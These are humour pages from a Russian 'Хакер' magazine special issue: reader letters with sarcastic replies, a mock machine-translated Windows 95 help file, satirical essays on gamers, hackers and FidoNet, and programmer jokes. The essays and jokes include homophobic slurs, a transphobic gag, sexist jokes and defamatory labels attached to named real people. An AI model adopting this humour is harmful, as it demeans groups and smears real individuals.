Макс Яковлев aka [LLZ]-MaDMaX


Спецвыпуск хакер, номер #001, стр. 001-126-9, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-9

dvolkov@mibif.indi.ru

Привет, редакция «Хакера». Вообще-то, я читаю много журналов о компьютерах и компьютерных играх... Но в последнее время что-то много стало как раз не очень хороших журналов, к числу которых можете себя причислить и вы. Я смотрю, вся ваша редакция считает себя крутыми хакерами и тому подобное. Какие же вы хакеры? По-моему, вы просто скопление ламеров, возомнивших себя фиг знает кем...

Ну а теперь о главном. Всего бы этого не было если бы не один из ваших горе-писателей Дмитрий Подх(н,к)урыжный, который ну уж очень, очень, очень меня обидел.

Цитата 1: «... по ларской кличке Крофт...»; цитата 2: «...постепенно вырождаясь в мыльную оперу с перезревшей шлюшкой в главной роли...»; цитата 3: «..да еще и с силиконовыми грудями, как у нее». Да как он посмел сказать такое. Сказать такое про девушку моей мечты, идеал женской красоты, она ведь...тут можно долго говорить. Дмитрий , ты меня обидел... если бы был у меня Интернет, вызвал бы тебя на дуэль на Q2DM1, но его нет, и приходится письменно тебя вразумлять. И больше не роняй таких выражений о Ларисоньке. Да, совсем забыл, к вопросу о силиконе. Дмитрий, ты не прав! Совсем это не силикон, можешь мне поверить, я проверял лично...

Злой и полный негодования Макс Яковлев.

г. Иваново.

:

Привет, Макс! Ты, я так понял, из славного города-героя Иваново. А Иваново-то, как известно, город невест. И что тебя в местных ивановках не устраивает, раз ты на англичанку (НАТОвку проклятую) заглядываешься? А-а-а-а-а, понял! Наверное, ты их чем-нибудь не устраиваешь... Тогда понятно. Уединяешься один на один с Ларочкой — и вперед... Да, первый Tomb Raider была классная гейма, вторая так себе, а уж третья — вообще ПОПСА. Ничего нового. Как в сериале бразильском — все одно и то же. Извини, что я так о сериалах отзываюсь (тебе, наверное, «Секрет тропиканки» нравится. Там девочки тоже ничего. И уж точно без силикона. А уж если Лара — девушка твоей мечты, то тебя можно пожалеть. Если для тебя идеал женской красоты — потасканная Лариска, ползающая раком перед миллионами геймеров, а еще миллионы раздевают ее каждый день... Ну-ну. Мечтай, мечтай.

Кстати, ты наверное не в курсе, что Лара Крофт — на самом деле трансвестит (для ивановцев разъясняю: трансвестит — это человек, сменивший пол). И раньше она была мужиком с самым настоящим натуральным (не силиконовым)... И настоящее имя этого трансвестита — Patrick J. Somerson.

А за базар надо отвечать. А то, «...вот если бы был Интернет, вызвал бы вас на дуэль». Отмазки гнилые... Мы-то всегда готовы. Только играем мы не в мыльный детсадовкий сериал Tomb Raider, а только в Кваку, так что туго тебе придется.

А теперь по поводу ЛАМЕРОВ и ХАКЕРОВ. Если ты считаешь, что настоящие хакеры играют в попсовую Tomb Raider и смотрят бразильские сериалы, то, наверное, мы не ХАКЕРЫ.

С силиконовым приветом, X.

Письмо:

traubery

traubery@mail.ru

Привет, «Хакер»!

Я вычитал из книги Бориса Леонтьева, что с помощью проги InterNet Crack можно у провайдера пароли воровать. Не могли бы вы написать что-нибудь поконкретней об этой программульке и где ее можно скачать?


Спецвыпуск хакер, номер #001, стр. 001-126-10, Письмо:

Письмо:

Alex Korolev

Спецвыпуск хакер, номер #001, стр. 001-126-10

Заранее благодарен, Freedoomer.

:

Молодец! Хорошо, что ты читаешь книги. Действительно, с помощью программки Internet Crack кто-то сможет воровать твои пароли. А еще он сможет отформатировать тебе винчестер и читать твою почту. Последние версии позволяют также забрать твою аську со всеми паролями. Так что запускай и вперед! Счастливого хакинга тем, кто создал эту программу, а Борису Леонтьеву отдельный, низкий поклон!

Цитата из ФИДО:

Вопрос: «Люди, тут, вроде пролетал крякер Интернета. Можно мне его? Заранее благодарен.»

Хор голосов: «Ламер! Крякера Интернета не бывает!»

Модератор: «Крякер интернета [++]. Правила читай!»

(http://www.dam.ru/lez/Faq/1.htm)


Спецвыпуск хакер, номер #001, стр. 001-132-1, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-1

Перевод куска текстовика к хелпу Win95 без основного словаря переводчиком Poliglossum с медицинским, коммерческим и юридическим словарем.

Microsoft компания получает много откликов после появления Окон 95. Мы выявили, что много пользователей встретили проблему мыши. В этом документе Служба Техничного Упора Microsoft компании сводит вместе всю полезную информацию о возможных проблемах с мышами и гуртовщиками мыши и забота-стреляние.

Если вы только что закрепили себе Окна 95, вы можете увидеть, что ваша мышь плохо себя ведет. Курсор может не двигаться или движение мыши может проявлять странные следы на поверхности стола, окнах и обоях. Мышь может неадекватно реагировать на щелчок по почкам. Но не спешите! Это могут быть физические проблемы, а не клоп Окон 95.

Почистите вашу мышь. Отсоедините ее поводок от компьютера , вытащите гениталий и промойте его и ролики внутренностей спиртом. Снова зашейте мышь. Проверьте на переломы поводка.

Подсоедините мышь к компьютеру. Приглядитесь к вашей прокладке (подушке) — она не должна быть источником мусора и пыли в гениталии и роликах. Поверхность прокладки не должна стеснять движения мыши.

Может быть вам стоит купить новую мышь. Мы настоятельно рекомендуем Microsoft мышь. Она эргономично спроектирована, особо сделана под Окна 95 и имеет третью почку в виде колеса, которые могут завивать окна. Совокупление Microsoft мыши и Окон 95 делает вашу повседневную работу легко приятной.

Испытайте все это. Если проблемы остались — ваш гуртовщик мыши плохо стоит под Окнами 95. Его придется убрать.

Вам нужен новый гуртовщик мыши. Если вы пользователь Microsoft мыши посетите Microsoft Слугу Паутины, где в особом подвале вы сможете опустить-загрузить самого текущего гуртовщика Microsoft мыши. Если производитель вашей мыши другой, узнайте о ее гуртовщике. Все основные производители мыши уже имеют гуртовщиков мыши для Окон 95.

Перед тем как вы будете закреплять гуртовщика мыши, сделайте заднюю-верхнюю копию ваших досье. Почистить ваш винчестер имеет смысл. У вас должен быть старт-вверх диск от Окон 95.

После того, как вы закрепили нового гуртовщика, скорее всего ваши проблемы решены. Если они остались, напишите в Службу Техничного Упора Microsoft, и вашим случаем займется Особый Отдел.

Для эффективной помощи техничного упора, наш инженер должен знать торговую марку вашей мыши, тип (в-портовая мышь, периодическая мышь, автобусная мышь, Полицейский Участок/2 мышь, без поводка мышь, гениталий на гусеничном ходу и т.п.), версию гуртовщика, производителя компьютера (матери-доски), положение портов и рубильников на матери-доске (и расклад карт), а также содержимое досье Авто-#####.bat, config.sys и Сапог-полено.txt.

Кроме того, несколько полезных советов:

1) не закрепляйте себе Окна 95 в то же самое место, где у вас закреплены Окна 3.икс, вы не сможете хорошо делать кое-что привычное.

2) если вы новичок под Окнами 95, привыкните к новым возможностям мыши. Щелкните по левой почке — выделите пункт, щелкните по правой кнопке меню с контекстом всплывет, быстро ударьте два раза по левой почке — запустите повестку в суд.


Спецвыпуск хакер, номер #001, стр. 001-132-2, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-2

4) отработайте быстрый двойной удар по почкам мыши с помощью специального тренажера на пульте управления Окнами 95.

6) специалисты Microsoft компании после большого числа опытов выявили, что наиболее эффективной командой из-под Окон 95 является «Послать на ...», которая доступна в любом времени и месте при ударе по правой почке мыши. Если вы только что закрепили себе окна 95, вы сумеете послать только на А (Б) и в специальное место «Мой портфель». Но по мере того как вы будете закреплять себе новые программы для Окон 95, вы начнете посылать на все более сложные и интересные места и объекты.

Особую эффективность команда «Послать на ...» приобретет при передачи посланий через Е-почту и общение с вашими коллегами и друзьями в местной сети-работе. Попробуйте мощь команды «Послать на...», и вы быстро убедитесь, что без нее трудно существовать под Окнами 95.

Пишите нам и помните, что Microsoft компания всегда думает о том, как вас лучше сделать.

Объявляется конкурс на самый дебильный автоматический перевод с «ненашего» на «наш». Победитель получит майку с автографом Бивиса.

Лучезапястный синдром

Долгое общение с компьютером оставляет в человеке неизгладимый след, который по своему благотворному влиянию уступает разве что альтернативной военной службе на урановых рудниках. В этом я в очередной раз смог убедиться сегодня, когда по простоте душевной диктовал девушке-оператору пейджинговой компании послание «Данилыч, замыль мне аттачем драйвера для есс-овского бластера под 95-ый мастдай, 548.24». По воцарившейся в трубке тишине я понял, что девушка, скорее всего, связывается сейчас с отделом по расследованию особо тяжких преступлений и предотвращению терроризма. Этот случай и заставил меня взяться за исследование пагубного влияния компьютера на человека. Я стал внимательно наблюдать за собой и своими друзьями, выискивая явные аномалии в поведении. Теперь узнать компьютерщика в толпе обывателей для меня — двухминутное дело, даже если на нем нет футболки с надписью «OS/2 — рулез форева!» и рюкзака с чем-то звякающим и булькающим за спиной.

Проще всего опознать представителя самого распространенного вида компьютерщиков — геймера. Почти у всех геймеров за долгие годы тяжелой борьбы с инопланетными соплями, фашистскими оккупантами и кланом Блэкрок выработались условные рефлексы, противостоять которым они уже не в силах. Понаблюдайте, например, за своим другом-фанатом игрушек, когда он будет открывать какую-нибудь дверь. Знаете, что вы увидите? Легким движением руки он повернет ручку и толкнет дверь вперед, сам же останется на пороге, готовый в любую минуту разрядить обойму воображаемого автомата в пугающую темноту комнаты. Когда вы будете идти с ним по улице, внимательно наблюдайте за его взглядом и действиями. Уверяю вас, он не оставит без внимания ни одну вентиляционную решетку или какое-нибудь приоткрытое окно на первом этаже. Если же вы будете заходить за угол, ваш приятель резко повернется и, сделав шаг в сторону, встретит неизвестность лицом к лицу (особо нервные, правда, останавливаются и судорожно пытаются нащупать на поясе наступательную гранату). Также можно попробовать проверить реакцию подопытного на внешние раздражители. Незаметно подойдите к нему и достаточно громко спокойным ровным голосом произнесите фразу: «We’re under attack!». Если подопытный ответит на это что-нибудь вроде: «Мы с Вованом вчера тоже вдрызг убухались,» — значит, он не настоящий джидай. Иногда геймеры могут выдать себя совершенно случайно. Если, например, ваш приятель при звуках популярной песенки «Инопланетный гость летит издалека» вдруг резко вскакивает с кресла — можете быть уверены, он только что собирался бежать апгрейдить зенитную установку Sad Sam.


Спецвыпуск хакер, номер #001, стр. 001-132-3, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-3

Настоящего компьютерщика всегда что-то выделяет из толпы. Обычно он идет один, низко склонившись над книгой Нортона «Эмуляция директив SSI для сервера CERN» или над брошюрой Алекса Экслера «Как нам реорганизовать рабкрин». Очень редко его можно увидеть вместе с девушкой. Если все же это необычайное событие произошло, просто подойдите поближе и послушайте, о чем он говорит. Если он занудно объясняет подружке, что «дискретное косинусоидальное преобразование сигнала осуществляется...», то можно смело ставить диагноз: перед вами настоящий программер, который не променяет скромные прелести www.totallynude.com на вздохи под луной и прочие глупости. Иногда компьютерщики ходят парами, в таком случае вычислить их не составляет большого труда: они всегда идут, оживленно обсуждая такие насущные проблемы, как «куда бы вставить Биллу Гейтсу?» и «почему Интел — сакс и мастдай», естественно, используя соответствующую терминологию. Кстати о терминологии: недавно был свидетелем интересного случая. Два парня чисто программерской наружности подходят на рынке к женщине, торгующей овощами. Попутно они разговаривали на тему оптимизации бинарного поиска. Тут один из парней вспоминает, зачем же они вообще пришли на рынок, и, с трудом отрываясь от беседы, бросает женщине: «Три метра картошки, пожалуйста». Я так понял, женщина видала и не таких придурков, потому что она, нисколько не удивившись, взяла линейку и стала честно отмерять три метра картофеля, лежавшего на витрине. Но ей все-таки пришлось усомниться в гуманности Господа Бога, когда парень осознал ее действия и с интересом спросил: «Ты чего, дура?».

Ну и, наконец, самая важная часть этой статьи: как вычислить хакера. Это очень сложная задача: настоящие хакеры редко показываются на улице и не заводят лишних знакомств, так что для опознания взаправдашнего хакера вам придется попасть к нему домой. Оказавшись в квартире этого маньяка, сразу начинайте осмотр территории. Если над дверью висит кумачовый транспарант «Рациональное программирование — наш ответ Microsoft», а на холодильнике приклеен портрет Билла Гейтса с надписью «Я тебя все равно достану, гадина!», значит, вы на верном пути. Обычно стены хакерского жилища за неимением обоев оклеены распечатками дампов памяти, описанием всевозможных прерываний и постерами из порножурналов. В холодильнике не должно быть никакой еды, кроме пива и трех пачек M&M’s. Если же вы все еще не уверены в правильности ваших догадок, попросите подозреваемого рассказать о своей дипломной работе. Если он вам начнет увлеченно рассказывать о наблюдении эффекта Энштейна-Подольского на примере нелинейной индукции гиперквантовых структур посредством облучения трансуранового кристалла экстремально-длинными волнами из заблокированного источника, то ваши опасения напрасны: этот человек — обыкновенный сумасшедший ученый. Настоящих хакеров всегда выгоняют из университета с третьего курса — за запуск программы warp, которая переворачивает панели Norton Commander’а.


Спецвыпуск хакер, номер #001, стр. 001-132-4, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-4

В поисках секса

Однажды теплым весенним вечером я вдруг осознал, что давно не жил активной сексуальной жизнью. На самом деле в этом нет ничего смешного — последним более-менее волнующим событием, которое можно было бы отнести в разряд романтических приключений, была установка звуковой платы известной китайской фирмы Noname. Существовало, конечно, довольно много выходов из сложившейся ситуации. Можно было, например, воспользоваться «всемирной компьютерной сетью Интернет» (наконец-то мне удалось ввернуть эту стильную фразу) и назначить виртуальное свидание какой-нибудь «Поночке» или «Мега-герл». Однако мой благородный пыл несколько охлаждала мысль о том, что под маской «Поночки», скорее всего, скрывается мой сосед — здоровый сибирский мужик с восьмого этажа. Да и не любили меня фанаты web-чатов и irc. Скорее всего это происходило потому, что я не мог больше минуты наблюдать разговоры вроде:

— Привет, Наташечка!

— Чмок-чмоки!

— Как дела?

— Все хорошо. А у тебя?

— И у меня классно!

— Ну и славно.

и настойчиво советовал всем присутствующим пройти курс интенсивной терапии в институте мозга, подчас аргументируя этот совет незатейливыми русскими выражениями с упоминанием дальних родственников участников чата.

Так или иначе, карьера виртуального Казановы была явно не для меня. Мне хотелось чего-нибудь особого, неповторимого и романтичного вроде реанимации жесткого диска под звуки песни «Ну а ты, ты кинула, ты, ты кинула!». Томимый этими жуткими мыслями, я отправился на улицу в поисках настоящего знакомства с девушкой со всеми вытекающими последствиями в виде цветов с соседней клумбы, разговоров на тему

«а вот Кате вчера подарили чудесное колечко с рубином» и стандартного «Все вы, мужики, одинаковые!» в финале.

Однако этим сладким мечтам не дано было осуществиться: в одной из подворотен меня ненавязчиво остановила группа приятных молодых людей, которые вежливо справились о текущем времени суток и температуре окружающей среды, символично поигрывая при этом кастетами. Попутно они также поинтересовались, не могу ли я пожертвовать свои часы, бумажник и куртку в фонд помощи ветеранам русско-японской войны.

Почти во всех руководствах по самообороне вы можете ознакомиться с бесчисленным числом инструкций, содержание которых сводится к «сломайте нападающему большой палец правой руки и, воспользовавшись его замешательством...». Я же знал только два действительно работающих приема борьбы с гопниками. Однако первый, проверенный годами метод «убегать и прятаться» в данном случае был неуместен, так как все пути к отступлению были отрезаныты. Оставался другой, несколько рискованный способ, о существовании которого я узнал от одного из подписчиков конференции RU.SUICIDE. Я гордо выпрямился, расправил плечи и отважно заявил одному из молодых людей:


Спецвыпуск хакер, номер #001, стр. 001-132-5, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-5

— Ты кого за ламера пингуешь, мастдай недопатченый?

Парни, видимо, не ожидали от меня такой активности, а потому на мгновение притихли. Я понял, что первая атака удалась, и продолжал нападение:

— Я, значит, всю ночь с серваком трахаюсь — Инет поднимаю, чтобы юзеры босса не убили к саксам собачьим, а вы мне тут такой флейм устраиваете?

Было заметно, что товарищ, к которому я обращался, начал нервничать и с опаской поглядывал на мою белую куртку — скорее всего, она напоминала ему о рубашках, рукава которых частенько завязываются, причем далеко не спереди. Я понял, что сейчас моя основная задача — не выпустить из рук инициативу, и продолжал с еще большим чувством в голосе:

— Да я же сисадмин, ребята! У меня таких, как вы, мастдаев — пятьдесят человек в одной сетке. Я вашему админу замылю — он вам такую жизнь устроит, что почту без мозгов тоссить будете!

Тут парни начали медленно отступать назад, смущенно бормоча что-то вроде: «Ну, мужик, ведь мы же не знали» и «Да ладно тебе, не горячись», а затем, не дождавшись окончания моей очередной тирады, скрылись в неизвестном направлении, как принято говорить в таких случаях.

Мой романтический настрой был окончательно испорчен, а потому я без зазрения совести отправился к ближайшей станции метро. Я собирался навестить своего старого приятеля Макса, живущего на окраине города. Надо сказать, победа над гопниками довольно сильно повлияла на меня: в метро я не перепрыгнул через ограждение, как обычно, а с невозмутимым видом прошел мимо вахтерши, важно заявив ей, что «у меня запрос на тридцать третье прерывание». Однако, несмотря на свое приподнятое настроение, до Макса я добрался без особых происшествий.

Описать Макса довольно просто. Представьте себе человека, всю одежду которого составляет футболка с надписью «Лейбниц умер, но дело его живет!» и джинсы, лежавшие в сэконд-хэнде еще в то время, когда Ева пересчитывала ребра Адаму, убеждаясь в его верности. Всем своим видом Макс олицетворяет главного героя известной песни «Я сегодня не такой как вчера, а вчера я был вообще никакой!». Любимым его занятием является наблюдение мигающего курсора в какой-нибудь глючной программе, сопровождающееся криками «Нет, ты только посмотри, она ведь весь прогрессбар перерисовывает!». Периодически он, правда, развлекается тем, что звонит мне и часа четыре подряд рассказывает, как полуось может форматировать два диска одновременно и доказывать попутно большую теорему Ферма. Я же не могу отомстить ему рассказами о «гомоморфных образах групп, изоморфных факторгруппам», поскольку дозвониться до него совершенно нереально, а когда это все-таки удается, трубку берет модем.


Спецвыпуск хакер, номер #001, стр. 001-132-6, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-6

Итак, я добрался до Макса к десяти часам. Не могу сказать, что он встретил меня с особой радостью: Макс не особо любил людей, тем более живых. Для меня, правда, иногда делалось исключение, поскольку я обладал уникальной способностью не падать в обморок при прослушивании его лекций на тему «использование proc_t структуры процесса для изменения его эффективного uid».

— Макс, — говорю я, выразительно глядя на плакат с полуголой Ларой Крофт. — А нет ли у тебя чего-нибудь... ээээ для души?

— Для души, говоришь, — задумчиво протянул он, шаря рукой под столом в поисках новой бутылки. — Слушай, а какая у тебя операционка?

— Windows’95.

— Виндоус, виндоус, и чего вы на нем все с ума посходили. Ну ведь защиты — никакой. Вчера посмотрел ‘98 версию, так программисты — как дети малые, честное слово. Ну как они криэйтят pwl, ну разве можно...

Последовавшие далее слова были понятны мне не более чем утренняя песня пьяного вождя племени Сиу. Однако я уже не слушал Макса: я выхватил из кучи грязных носков в углу компакт-диск с гордой надписью «Windows’98: Final Release», на его обороте был логотип «Warez-подвал дяди Васи» и скромная приписка «остерегайтесь грязных пиратских подделок».

Я бежал по вечернему городу, прижимая к груди это бесценное сокровище. В голове беспрестанно крутилось «О, сколько нам открытий чудных готовит просвещенья дух...». Перед моими глазами возникали картины потрясающей красоты. То мимо проплывал файл setup.exe: это был большой голубой пароход, с которого доносились слова берущей за душу песни «Эх раз, да еще раз, да еще много-много-много раз...». Откуда-то из глубины сознания появились сияющие строчки «...и опыт, сын ошибок трудных...». Но их тут же сменил корабельный врач со словами «У пациента обнаружена кровь из носа, наложить жгут на шею?», который вдруг превратился в печального хирурга, произносящего: «Мы его потеряли...содержимое ДНК...время смерти...». Вдруг все исчезло и наступила абсолютная тишина. Но через некоторое время до меня стал доноситься слабый голос, постепенно набирающий силу. Я затаил дыхание и отчетливо услышал слова веселой песенки: «Нда-нунда-рунда, я увижу об-ла-кА!». Картина опять прояснилась: я видел большой красивый корабль, плывущий по бескрайнему океану звездной ночью. С корабля доносилась красивая музыка, было слышно, как смеялись и пели люди. И лишь далеко впереди был едва различим голубоватый айсберг. Я думал о том, какая чудесная ночь ждет меня, наконец-то я нашел ее, свою единственную и неповторимую...

Праувда о фидо

Добрый день, дорогие друзья. Наша сегодняшняя педарач... тьфу ты, передача посвящена известной компьютерной сети ФИДО. Все вы, наверняка, слышали уже удивительные истории об этой милой сети друзей, в которой каждый может беспрепятственно высказать свое мнение, излить душу (небывалого мастерства в этой области достигли подписчики конференции TYT.BCE.HAC-PEM) и просто пообщаться с интересными людьми. Во всяком случае, так рисуют нам ФИДО жизнерадостные акулы пера в промежутках между написанием статей под заголовками типа «Русские хакеры топят атомный авианосец Миссури». Я же постараюсь не приукрашивать суровую правду жизни и показать вам ФИДО таким, каким оно и является на самом деле, поэтому не рекомендую читать эту статью людям со слабой психикой, беременным дет... тьфу, женщинам и детям до 16.


Спецвыпуск хакер, номер #001, стр. 001-132-7, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-7

Для начала немного истории: основателем сети ФИДО является пид... эээ... в смысле гей и анархист Том Дженнингс. Я так думаю, внимательные читатели уже сделали нехитрые выводы насчет «сети друзей» и «общения с интересными людьми» в частности. Некоторые товарищи, правда, начнут сейчас протестовать, бормоча что-то о правах человека и об эстетической красоте припева песни «Голубая луна». Совершенно с ними согласен, но дело в том, что нынешние фидошники уже давно перещеголяли отца-основателя по части всяческих эээ... отклонений от обычного образа жизни. Например, самым известным членом этой сети, на которого хочет походить чуть ли ни каждый второй фидошник, является Олег Бочаров: некрофил, фашист, кретин и бывший ведущий радиопередачи «Сумерки человечества». Для справки: после выхода в эфир этой передачи наиболее стойкие слушатели требовали его расстрелять, а остальные добровольно шли договариваться о постоянном месте жительства в лечебнице для душевнобольных. Так что если вы видите человека, личная жизнь которого протекает по принципу «Лучшая подружка — мертвая старушка» и который, молясь в душе, весело напевает «Порвать на свастики ребенка!» или насвистывает «Дойчлен зольдатен», то скорее всего это один из постоянных читателей конференции BOCHAROFF.SUX. Как оговорилась однажды моя знакомая, в нашей прекрасной стране для каждого найдется свой институт: для медиков — мед, для педиков — пед, так и в ФИДО любой может выбрать круг общения по интересам: от MAMA.ANARHIYA до RU.SEX.SADO-MAZO и RU.ONANIZM.

Чтобы вы не решили, что ФИДО — это сборище извращенцев со стажем, приведу описания нескольких вполне нормальных тематических конференций:

RU.ANEKDOT:

Вообще-то эта конференция изначально была предназначена для публикации анекдотов, однако давно уже используется совершенно для других целей. Больше половины писем — это сообщения модератора об отключении таких-то узлов за нарушение правил. Периодически, правда, кто-то рассказывает и анекдоты, но в основном это вариации на тему «Идут два мужика: один модератор, а другой — тоже козел!» или коронный «Снесла курочка дедушке яичко... начисто». За рассказ последнего человеку, кстати, грозит пожизненное отключение, публичная кастрация через повешенье и групповое изнасилование с элементами некрофилии. Где-то раз в три месяца особо одаренные товарищи кидают анекдоты в духе «Ползет девочка по концлагерю», после чего начинается оживленная дискуссия на тему «Почему земля еще носит таких [beep] и что [beep] всех вас в [beep], пока не [beep] на [beep]», которая не прекращается до очередного анекдота про курочку.

RU.HACKER:


Спецвыпуск хакер, номер #001, стр. 001-132-8, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-8

Здесь занимаются исключительно постингом троянов и вирусов. Почти каждый день кто-нибудь посылает письмо с текстом вроде «Запустите приаттаченный файл и пользуйтесь инетом на халяву», а недели через две появляется лавина откликов «Ну я запустил, а потом почему-то винт отформатировался, может, я чего неправильно сделал? Пошлите плиз заново ту программу!». Обитает в этой конференции исключительно элитарный народ. Если вас зовут Вася Ложкин, а не DArk MegAHa(Ker oF Ubl0, то можете даже не соваться сюда — просто засмеют. Поэтому обязательно придумайте себе крутой псевдоним, найдите в словаре побольше стильных слов и смело пишите в начале письма «Здрасти уважаимый All, преветсвуит тебя Mad Sc0lTrAg из // SIEGE // PISYA TEAM // B0LAN // MLGie // DEVasT //». Также не следует обходить вниманием и подпись — настоящие фидошные хакеры всегда помещают в конец письма килобайт-другой полезной информации вроде «[Рано встовать — sux]-[Нинавижу Лену Зосимаву]-[Школа — mustdie]-[Балтека N9]».

RU.PICKUP:

В этой конференции любят тусоваться крутые интеллектуалы, обсуждающие методы пикапа девушек. Отвечая на вопрос «Как же все-таки познакомиться с девушкой?», мне сначала говорили всякие умные слова вроде «нейро-лингвистическое программирование» и «разрыв шаблона», а затем порекомендовали подойти и нагло бросить «Пошли, потрахаемся!». Надо сказать, после проведения подобного эксперимента я потом несколько недель с трудом передвигался, потому что подопытная девушка, как оказалось, ждала своего отца-боксера.

Тем не менее, за несколько лет пребывания в ФИДО у меня окончательно сложилось мнение, что это не сеть, а замаскированная секта алкоголиков-извращенцев. Все начинается с того момента, когда человек соглашается на уговоры своего приятеля-фидошника и произносит заветное «ну давай, почитаем эту вашу фидо-почту». По прошествии же нескольких дней обратить деструктивный процесс становится невозможно: человек перестает мыться, бриться, есть, спать и говорить, вместо этого он начинает пить, писать, читать и периодически ругаться непонятными словами вроде «фрекни с ориджина фак о бинклистайл аутбаунд». Вечером и ночью его телефон постоянно занят, а родным фидошник доходчиво объясняет, что ему нужно сконнектиться с босом, чтобы забрать пакеты, ведь там десять метров в уююках, а через два часа наступит ZMH и его не волнует, что сейчас Новый год и надо позвонить тете Тоне из Одессы. Поинтересовавшись только «Всем ли наступит полный ZMH или только некоторым?», близкие оставляют человека наедине с этим жутким наркотиком под названием ФИДО, разрушая этим всю его дальнейшую жизнь. Скорее всего вы уже наслышаны о том, что ФИДО — полностью некоммерческая сеть, в которой все держится на голом энтузиазме ее членов. Плюньте в глаза тому, кто сказал вам эту глупость. В ФИДО все держится на пиве! Фидошники со стажем на деле доказывают крестьянскую истину поговорки «Умные люди попишут-попишут, да и выпьют бутылочку». Где-то раз в месяц организуется мероприятие под названием «поинтовка», на котором проходит так называемое «обсуждение дальнейшей политики узла». И, надо вам сказать, порой это обсуждение проходит так интенсивно, что многим участникам приходится впоследствии воспользоваться услугами медвытрезвителя.


Спецвыпуск хакер, номер #001, стр. 001-132-9, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-9

Ни в коем случае не позволяйте затянуть себя в эту жуткую компьютерную секту. Надеюсь, моя статья позволит вам получить правильное представление о самых страшных жителях компьютерного андеграунда и избежать пагубного влияния ФИДОнет. Уже сейчас ко мне в дверь стучат мои друзья-фидош...

(далее текст невозможно прочитать из-за огромных пятен от пролитого пива и жирных надписей зеленым маркером

«FIDO — rulezzz!!!»)

Анекдоты

Программист возвpащается поздно домой. Его встpечает двое гpомил. Один из них достает нож и говоpит:

- Гони деньги.

«Пpовайдеpы,» — подумал программист.

Умиpает молодой и талантливый пpогpаммист. Попадает к Богу на суд и плачется:

- Господи! Почему я умеp молодым? Я ведь был хоpошим, жене не изменял, виpусов не писал, на поpносайты не лазил... За что ты меня лишил жизни???

Бог поднимает Библию и гpозит программисту пальчиком:

- RTFM, батенька... RTFM.

Чайник спрашивает у хакера: «Как перезагрузить компьютер?»

Тот после секундного размышления отвечает: «Ctrl + Shift + Reset».

Чайник подходит к хакеру и показывает исходник неработающей программы:

- Посмотри, где у меня ошибка?

- В ДНК!!!

Чем юзер отличается от хакера?

Если попросить их перезагрузить комп, пользуясь только мышкой, то юзер жмет на «завершение работы» в Виндовсе.

А что сделает хакер? Он поднимет мышку со стола и нажмет ею на Reset.

Пpогpаммист приходит домой pано yтpом. Жена грозно спpашивает:

- Где шлялся?

- Да y любовницы был: вино, музыка, то да се...

- Hе ври, опять, наверное, всю ночь в Интернете просидел!

Стоят старая и молодая проститутки на боевом посту. Старая все объясняет — к кому подходить, к кому не надо...

На рассвете вдруг из дверей офиса нетвердой походкой выходит мужик, волосы взъерошены, глаза красные...

Молодая:

- Ой, что это с ним?

Старая:

- Не обращай внимания. Это свой, программист. Тоже всю ночь трахался.

Забрали сисадмина в армию. На границе служить. Стоит он на посту. Вдруг шаги.

- Пароль!!! — ...тишина.

- Пароль!!!! — ...тишина.

Сисадмин снимает с плеча автомат и расстреливает идущего. После этого громко объявляет:

- User Anonymous: Access Denied.

Мужик заходит в лавочку, торгующую легальным софтом. Подходит к одному из продавцов и тихо-тихо говорит:

- Мне Windows’98, пожалуйста.

Тут все, и покупатели и продавцы, замирают и пристально смотрят на мужика. Мужик не выдерживает такой паузы, оборачивается ко всем и кричит:

- Да! Да! Трахаться я иду!

Идут курсы Майкрософт по Win’98. Инструктор (И) читает лекции чайникам-слушателям, среди которых случайно затесался программер (П).

(И) — Windows’98 — это абсолютно надежная система, но если все же что-то случится, то для этих целей существует утилита Scandisk, которая работает абсолютно безупречно. Главное — не вздумайте отключать автоматический запуск этой утилиты после сбоев в работе. Вот недавно был такой случай: один программист удалил Scandisk, и когда Windows’98 случайно повисла, то после перезагрузки жесткий диск был поврежден, а неисправность не была устранена. А на другом компьютере, где была установлена эта утилита, после сбоя в работе Windows’98 проверила диск, поставила новые параметры и для подстраховки перезагрузила компьютер.


Спецвыпуск хакер, номер #001, стр. 001-132-10, Щелчок по почкам

Щелчок по почкам

Спецвыпуск хакер, номер #001, стр. 001-132-10

(П) — Ага, знаю я этот комп, до сих пор Scandisk’ом проверяется, ставит новые параметры и для подстраховки перезагружается...

Поймал мужик(M) золотую pыбку(Р):

(Р) - Загадывай желание.

(М) - Я хочу, чтобы был миp во всем миpе!

(Р) - Не, ну это слишком сложно.

(М) - Ну тогда пусть Windows’98 не глючит.

(Р) - Мир во всем мире, говоришь?

Говорят, что Билл Гейтс сделал свой бизнес следующим образом: он клал клавиатуру на стул и прыгал по ней своей задницей некоторое время, потом компилировал и продавал, что получилось.

Узнав об этом, несколько ламеров решили тоже сделать что-нибудь потрясное и, сев на клавиатуры, довольно долго прыгали, когда же вконец отбили задницы, то компильнулись, запустились и прочли: «Хренушки, ребятушки, задницей только Билли что-то написать может...»

Идет урок. Учительница выясняет у учеников, кем работают их родители.

Петя: Мой папа — электрик.

Катя: А моя мама — менеджер.

Вовочка: А мой папа в борделе с пакетами трахается.

На следующий день вызывают вовочкиного папу в школу:

— Неужели вы на самом деле в борделе работаете? И сын про это знает???

— Да нет, вообще-то, я программист, специализируюсь на коммуникационном протоколе TCP/IP в системе UNIX, но надо же было как-то попроще семилетнему ребенку объяснить.

Утро. Хмурый как туча программист входит на кухню с благородной целью чем-нибудь подкрепиться после бессонной ночи, проведенной за родным компом. Через какое-то время на кухне появляется жена и, заметив, мягко говоря, хреновое настроение своего супруга, спрашивает:

— Что, Васенька, программа не заработала?

— Заработала!..

— Что, может... неправильно заработала?

— Да правильно заработала... мать ее за ногу!..

— Васенька, а почему же ты тогда такой грустный?

— На бэкспейсе вздремнул!!!

